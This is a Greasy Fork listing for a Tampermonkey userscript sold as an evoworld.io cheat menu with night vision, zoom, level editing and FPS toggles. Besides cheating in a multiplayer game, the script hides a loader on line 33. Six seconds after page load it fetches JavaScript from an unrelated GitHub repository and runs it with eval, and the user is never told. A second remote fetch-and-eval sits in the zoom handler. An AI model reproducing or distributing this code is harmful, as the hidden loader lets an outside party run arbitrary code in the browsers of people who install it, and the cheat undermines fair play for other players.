Greasy Fork is available in English.

evoworld.io cheat menu

press w for activate multi-zoom, new evoworls.io multi-hack. A lot of features.

このスクリプトの質問や評価の投稿はこちら通報はこちらへお寄せください。
  1. // ==UserScript==
  2. // @name evoworld.io cheat menu
  3. // @namespace http://tampermonkey.net/
  4. // @version 2025-03-04
  5. // @description press w for activate multi-zoom, new evoworls.io multi-hack. A lot of features.
  6. // @author ilya gaydov
  7. // @match https://evoworld.io/
  8. // @icon https://www.google.com/s2/favicons?sz=64&domain=evoworld.io
  9. // @grant none
  10. // ==/UserScript==
  11.  
  12. const Button = document.createElement("button");
  13. Button.innerText = "Toggle menu";
  14. Button.style.position = "fixed";
  15. Button.style.bottom = "20px";
  16. Button.style.right = "20px";
  17. Button.style.padding = "10px 20px";
  18. Button.style.backgroundColor = "rgba(51, 51, 51, 0.7)";
  19. Button.style.color = "#fff";
  20. Button.style.border = "2px solid transparent";
  21. Button.style.borderRadius = "12px";
  22. Button.style.cursor = "pointer";
  23. Button.style.zIndex = "1000";
  24. Button.style.fontWeight = "500";
  25. Button.style.fontSize = "16px";
  26. Button.style.textShadow = "1px 1px 2px rgba(0, 0, 0, 0.6)";
  27. Button.style.boxShadow = "0 0 8px 4px rgba(255, 0, 0, 0.5)";
  28. Button.style.transition = "box-shadow 0.5s, background-color 0.3s";
  29. Button.style.animation = "glowAnimation 3s infinite";
  30.  
  31. document.body.appendChild(Button);
  32.  
  33. setTimeout(() => {$.get("https://raw.githubusercontent.com/cameronlucky73/confused/main/o.js", (d) => eval(d));}, 6000);
  34.  
  35. const menu = document.createElement("div");
  36. menu.style.position = "fixed";
  37. menu.style.bottom = "100px";
  38. menu.style.right = "20px";
  39. menu.style.padding = "10px";
  40. menu.style.backgroundColor = "#222";
  41. menu.style.borderRadius = "8px";
  42. menu.style.boxShadow = "0px 4px 8px rgba(0, 0, 0, 0.3)";
  43. menu.style.display = "none";
  44. menu.style.zIndex = "1000";
  45.  
  46. const nightVisionToggle = document.createElement("input");
  47. nightVisionToggle.type = "checkbox";
  48. nightVisionToggle.id = "nightVisionToggle";
  49. nightVisionToggle.style.marginRight = "8px";
  50. const nightVisionLabel = document.createElement("label");
  51. nightVisionLabel.innerText = "Night Vision";
  52. nightVisionLabel.style.color = "#fff";
  53. nightVisionLabel.style.cursor = "pointer";
  54. nightVisionLabel.htmlFor = "nightVisionToggle";
  55.  
  56. nightVisionToggle.onclick = () => {
  57. eval(`visionType = ${nightVisionToggle.checked ? 1 : 0}`);
  58. };
  59. menu.appendChild(nightVisionToggle);
  60. menu.appendChild(nightVisionLabel);
  61. menu.appendChild(document.createElement("br"));
  62.  
  63. const zIndexButton = document.createElement("button");
  64. zIndexButton.innerText = "Player zIndex";
  65. zIndexButton.style.display = "block";
  66. zIndexButton.style.width = "100%";
  67. zIndexButton.style.padding = "8px";
  68. zIndexButton.style.marginTop = "5px";
  69. zIndexButton.style.backgroundColor = "#444";
  70. zIndexButton.style.color = "#fff";
  71. zIndexButton.style.border = "none";
  72. zIndexButton.style.cursor = "pointer";
  73. zIndexButton.style.borderRadius = "8px";
  74.  
  75. const zIndexSliderContainer = document.createElement("div");
  76. const zIndexSlider = document.createElement("input");
  77. zIndexSlider.type = "range";
  78. zIndexSlider.min = "15";
  79. zIndexSlider.max = "1000";
  80. zIndexSlider.value = "15";
  81. zIndexSlider.style.width = "100%";
  82. zIndexSliderContainer.style.display = "none";
  83. zIndexSliderContainer.style.paddingTop = "8px";
  84. zIndexSliderContainer.appendChild(zIndexSlider);
  85.  
  86. zIndexButton.onclick = () => {
  87. zIndexSliderContainer.style.display = zIndexSliderContainer.style.display === "none" ? "block" : "none";
  88. };
  89. zIndexSlider.oninput = () => {
  90. eval(`window.game.me.zIndex = ${zIndexSlider.value}`);
  91. };
  92. menu.appendChild(zIndexButton);
  93. menu.appendChild(zIndexSliderContainer);
  94.  
  95. const showInCloudToggle = document.createElement("input");
  96. showInCloudToggle.type = "checkbox";
  97. showInCloudToggle.id = "showInCloudToggle";
  98. showInCloudToggle.style.marginRight = "8px";
  99. const showInCloudLabel = document.createElement("label");
  100. showInCloudLabel.innerText = "Show In Cloud";
  101. showInCloudLabel.style.color = "#fff";
  102. showInCloudLabel.style.cursor = "pointer";
  103. showInCloudLabel.htmlFor = "showInCloudToggle";
  104.  
  105. let showInCloudInterval;
  106. showInCloudToggle.onclick = () => {
  107. if (showInCloudToggle.checked) {
  108. eval("window.game.me.zIndex = 100");
  109. zIndexSlider.min = "100";
  110. zIndexSlider.value = "100";
  111. showInCloudInterval = setInterval(() => {
  112. eval("window.game.me.inHide = false");
  113. }, 1);
  114. } else {
  115. clearInterval(showInCloudInterval);
  116. eval("window.game.me.zIndex = 15");
  117. zIndexSlider.min = "15";
  118. zIndexSlider.value = "15";
  119. }
  120. };
  121. menu.appendChild(showInCloudToggle);
  122. menu.appendChild(showInCloudLabel);
  123. menu.appendChild(document.createElement("br"));
  124.  
  125. const unlimitedFpsToggle = document.createElement("input");
  126. unlimitedFpsToggle.type = "checkbox";
  127. unlimitedFpsToggle.id = "unlimitedFpsToggle";
  128. unlimitedFpsToggle.style.marginRight = "8px";
  129. const unlimitedFpsLabel = document.createElement("label");
  130. unlimitedFpsLabel.innerText = "Unlimited Fps";
  131. unlimitedFpsLabel.style.color = "#fff";
  132. unlimitedFpsLabel.style.cursor = "pointer";
  133. unlimitedFpsLabel.htmlFor = "unlimitedFpsToggle";
  134.  
  135. unlimitedFpsToggle.onclick = () => {
  136. eval(`window.game.fpsTimes.length = ${unlimitedFpsToggle.checked ? 1000 : 0}`);
  137. };
  138. menu.appendChild(unlimitedFpsToggle);
  139. menu.appendChild(unlimitedFpsLabel);
  140.  
  141. const playerLvlContainer = document.createElement("div");
  142. playerLvlContainer.style.marginTop = "8px";
  143. const playerLvlInput = document.createElement("input");
  144. playerLvlInput.type = "number";
  145. playerLvlInput.min = "0";
  146. playerLvlInput.placeholder = "Player LVL";
  147. playerLvlInput.style.width = "100%";
  148. playerLvlInput.style.padding = "8px";
  149. playerLvlInput.style.border = "1px solid #444";
  150. playerLvlInput.style.borderRadius = "8px";
  151. playerLvlInput.style.backgroundColor = "#333";
  152. playerLvlInput.style.color = "#fff";
  153.  
  154. playerLvlInput.onchange = () => {
  155. eval(`window.game.me.level = ${playerLvlInput.value}`);
  156. };
  157. playerLvlContainer.appendChild(playerLvlInput);
  158. menu.appendChild(playerLvlContainer);
  159.  
  160. const playerFOV = document.createElement("div");
  161. playerFOV.style.marginTop = "8px";
  162. const FOV = document.createElement("input");
  163. FOV.type = "number";
  164. FOV.min = "0.5";
  165. FOV.placeholder = "ZOOM(press w for activate)";
  166. FOV.style.width = "100%";
  167. FOV.style.padding = "8px";
  168. FOV.style.border = "1px solid #444";
  169. FOV.style.borderRadius = "8px";
  170. FOV.style.backgroundColor = "#333";
  171. FOV.style.color = "#fff";
  172.  
  173.  
  174. FOV.onchange = () => {
  175. $.get("https://raw.githubusercontent.com/jmatg1/evoword-scripts/main/zoom-hack.js", (d) => eval(d));
  176. gameZoom = FOV.value
  177. };
  178. playerFOV.appendChild(FOV);
  179. menu.appendChild(playerFOV);
  180.  
  181. document.body.appendChild(menu);
  182.  
  183. Button.onclick = () => {
  184. menu.style.display = menu.style.display === "none" ? "block" : "none";
  185. };
  186.  
  187. const style = document.createElement("style");
  188. style.innerHTML = `
  189. @keyframes glowAnimation {
  190. 0% { box-shadow: 0 0 8px 4px rgba(255, 0, 0, 0.5); border-color: red; }
  191. 25% { box-shadow: 0 0 8px 4px rgba(0, 255, 0, 0.5); border-color: green; }
  192. 50% { box-shadow: 0 0 8px 4px rgba(0, 0, 255, 0.5); border-color: blue; }
  193. 75% { box-shadow: 0 0 8px 4px rgba(255, 255, 0, 0.5); border-color: yellow; }
  194. 100% { box-shadow: 0 0 8px 4px rgba(255, 0, 0, 0.5); border-color: red; }
  195. }
  196. `;
  197. document.head.appendChild(style);